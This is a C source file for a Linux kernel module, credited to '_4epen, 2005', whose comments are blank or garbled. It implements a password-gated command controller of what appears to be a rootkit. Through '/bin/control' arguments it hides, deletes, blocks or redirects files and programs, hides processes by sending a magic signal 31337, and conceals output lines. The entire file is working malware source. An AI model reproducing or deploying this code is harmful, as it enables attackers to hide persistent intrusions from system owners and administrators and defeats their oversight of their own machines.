/***********************************************
 *                                             *
 *      .  *
 *         *
 *   /bin/control.              *
 *  Written by _4epen, 2005.                   *
 *                                             *
 ***********************************************/
 
#include <asm/uaccess.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/security.h>

#include "options.h"
#include "defines.h"
#include "prototp.h"

/*     */
void add_conf(const char*[], int);
void del_conf(const char*[], int);
void add(const char*, char*, int, int);
void del(const char*, int, int);

extern int (*o_brk)(void*);

/*      */
extern char *hidden_lines[MAX_INDEX];
extern int hl_count;

/*     */
void controller(const char* argv[], const char* envp[])
{
	int i, j, k=0;
	/*       */
	if(argv[1]==NULL) return;
	/*     */
	if(!strcmp(argv[1], "auth") && !strcmp(argv[2], PASSWORD)) authorized = 1;
	/*       */
	if(!authorized) return;
	/*    /  */
	if(!strcmp(argv[1], "hide")) add_conf(argv, HIDE);
	if(!strcmp(argv[1], "del")) add_conf(argv, DELETE);
	if(!strcmp(argv[1], "show")) del_conf(argv, DELETE);
	if(!strcmp(argv[1], "unhide")) del_conf(argv, HIDE);
	/*    /  */
	if(!strcmp(argv[1], "deny")) add_conf(argv, DENY);
	if(!strcmp(argv[1], "allow")) del_conf(argv, DENY);
	/*    /  */
	if(!strcmp(argv[1], "redirect")) add_conf(argv, REDIRECT);
	if(!strcmp(argv[1], "normalize")) del_conf(argv, REDIRECT);
	/*        */
	if(!strcmp(argv[1], "addline")) {
		/*       */
		if(argv[2]==NULL) return;
		/*        */
		hidden_lines[hl_count] = (char*)kmalloc(strlen(argv[2])+1, GFP_KERNEL);
		copy_from_user(hidden_lines[hl_count], argv[2], strlen(argv[2])+1);
		/*       */
		hl_count++;
	}
	/*        */
	if(!strcmp(argv[1], "delline")) {
		/*      */
		for(i=0;i<hl_count;i++) if(!strcmp(hidden_lines[i], argv[2])) { k = 1; break; }
		/*      */
		if(k==1) {
			/*      */
			kfree(hidden_lines[i]);
			/*      */
			for(j=i;j<hl_count-1;j++) hidden_lines[j]=hidden_lines[j+1];
			hl_count--;
		}
	}
	/*      */
	if(!strcmp(argv[1], "close")) authorized = 0;
}

/*      */
void add(const char* file, char* redir, int mode, int type)
{
	/*    /  */
	options[n_options].i_name = (char*)kmalloc(strlen(file)+2, GFP_KERNEL);
	strcpy(options[n_options].i_name, file);
	/*       */
	options[n_options].mode = mode;
	options[n_options].type = type;
	/*   ,    /  */
	if(mode==REDIRECT) {
		options[n_options].i_redr = (char*)kmalloc(strlen(redir)+2, GFP_KERNEL);
		strcpy(options[n_options].i_redr, redir);
	}
	/*       */
	n_options++;
}

/*      */
void add_conf(const char* argv[], int mode)
{
	char* temp;
	temp = NULL;
	/*       */
	if(argv[2]==NULL) return;
	if(argv[3]==NULL) return;
	if(mode==REDIRECT) if(argv[4]==NULL) return;
	/*      */
	if(mode==REDIRECT) temp = (char*)argv[4];
	/*      */
	if(!strcmp(argv[2], "file")) add(argv[3], temp, mode, FILE);
	/*      */
	if(!strcmp(argv[2], "prog")) add(argv[3], temp, mode, PROG);
	/*      */
	if(!strcmp(argv[2], "proc")) h_kill(atoi((char*)(argv[3])), 31337);
}

/*      */
void del(const char* file, int mode, int type)
{
	int i, j, k;
	/*      */
	k = 0;
	for(i=0;i<n_options;i++) 
	if(!strcmp(options[i].i_name, file) && (options[i].mode==mode) && (options[i].type==type)) { k = 1; break; }
	/*     */
	if(k==1) {
		/*     */
		kfree(options[i].i_name);
		if(options[i].i_redr) kfree(options[i].i_redr);
		/*      */
		for(j=i;j<n_options-1;j++) {
			options[j].i_name = options[j+1].i_name;
			options[j].i_redr = options[j+1].i_redr;
			options[j].mode = options[j+1].mode;
			options[j].type = options[j+1].type;
		}
		/*       */
		n_options--;
	}
}

/*      */
void del_conf(const char* argv[], int mode)
{
	/*       */
	if(argv[2]==NULL) return;
	if(argv[3]==NULL) return;
	/*     */
	if(!strcmp(argv[2], "file")) del(argv[3], mode, FILE);
	/*     */
	if(!strcmp(argv[2], "prog")) del(argv[3], mode, PROG);
	/*     */
	if(!strcmp(argv[2], "proc")) show_proc(atoi((char*)(argv[3])));
}
